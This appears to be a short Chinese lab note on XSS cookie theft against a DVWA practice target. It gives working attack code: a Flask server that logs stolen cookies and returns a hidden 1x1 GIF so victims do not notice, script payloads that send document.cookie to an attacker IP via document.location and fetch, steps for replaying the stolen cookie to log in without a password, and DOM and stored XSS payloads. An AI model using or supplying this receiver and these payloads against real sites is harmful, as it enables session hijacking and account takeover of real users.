1、接收cookie端攻击机上用python写个接收web程序flask
python
from flask import Flask, request, Response
app = Flask(__name__)
@app.route('/')
def save_cookie():
cookie = request.args.get('cookie', '')
if cookie:
with open('/root/cookies.txt', 'a') as f:
f.write(f"{cookie}\n")
# 返回1x1透明GIF(避免被用户察觉)
return Response(b'GIF89a\x01\x00\x01\x00\x80\x00\x00\xff\xff\xff\x00\x00\x00!\xf9\x04\x01\x00\x00\x00\x00,\x00\x00\x00\x00\x01\x00\x01\x00\x00\x02\x02D\x01\x00;', mimetype='image/gif')
if __name__ == '__main__':
app.run(host='0.0.0.0', port=80)
2、dvwa靶机上进行xss测试(3种方法)
php
<script>document.location='http://192.168.168.130/?cookie='+document.cookie;</script>
<script>fetch('http://192.168.168.130/?cookie=' + document.cookie);</script>
3、把获取的cookie中最后一个等号后面的是cookie值,打开火狐按F12,点击存储store,把获取的cookie值替换进去,就能直接打开不用账户密码了
???
dvwa中DOM型注入(直接在xss的dom网址上改后面的default=就能获取cookie)
php
http://192.168.168.133/dvwa-master/vulnerabilities/xss_d/?default=<script>alert(document.cookie);</script>
???
dvwa中存储型注入(先按F12把name表单长度改长一点)
name中输入:
php
<script>alert(document.cookie);</script>
message中随便输入:Payload
以后每次打开这个存储型页面就会弹cookie出来